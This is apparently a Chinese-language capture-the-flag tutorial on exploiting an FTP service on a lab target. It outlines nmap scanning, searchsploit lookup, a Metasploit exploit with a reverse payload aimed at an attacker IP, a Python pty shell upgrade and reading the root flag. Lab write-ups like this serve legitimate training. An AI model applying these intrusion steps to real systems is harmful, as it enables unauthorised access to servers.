CTF奪旗 服務安全FTP服務

FTB的簡介:

FTP 是File Transfer Protocol(文件傳輸協議)的英文簡稱,而中文簡稱爲“文傳協議”。用於Internet上的控制文件的雙向傳輸。同時,它也是一個應用程序(Application)。基於不同的操作系統有不同的FTP應用程序,而所有這些應用程序都遵守同一種協議以傳輸文件。在FTP的使用當中,用戶經常遇到兩個概念:“下載”(Download)和"上傳"(Upload)。"下載"文件就是從遠程主機拷貝文件至自己的計算機上;"上傳"文件就是將文件從自己的計算機中拷貝至遠程主機上。用Internet語言來說,用戶可通過客戶機程序向(從)遠程主機上傳(下載)文件。

同樣的方法,用nmap -sV ip語法進行掃描靶機的一些服務信息和服務版本,用nmap -T4 -A -v ip語法快速掃描靶機的全部信息。

針對掃描的結果進行分析,得出靶機的版本軟件。

然後用searchsploit 版本軟件名稱進行掃描查看是否有漏洞,如果有會掃描出漏洞文件存儲的根目錄和分位目錄(文件名)。

利用cat 根目錄/文件名查看源代碼,
然後我們可以進行修改一些參數來實現遠程溢出。

使用metasploit進行溢出

在終端中輸入msfconsole來打開Metasploit(集成了滲透測試當中所有工具安裝框架)。

然後ssearch 軟件及版本號進行搜索是否有漏洞模塊。
使用exploit 來利用漏洞模塊
use exploit/根目錄

查看可以使用的payload
show payload

設置payload
set payload

設置參數

查看可以設置的參數show options

設置目標IP地址set rhost 靶場IP

設置監聽IP地址set lhost 攻擊機IP

檢測是否設置成功(查看參數)show options

進行遠程溢出exploit

執行命令 (查看用戶當前所得到的權限,即獲得root權限)id

優化shell

使用python pty 終端開啓
python –c “import pty;pty.spawn(‘/bin/bash’)”

flag獲取

一般情況下,靶場機器的flag值是存放在服務器的根目錄下,/root/目錄(ls -alh查看目錄)。

切換root目錄:cd /root/
查看該目錄是否有flag值:ls
查看對應的flag值:cat flag

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章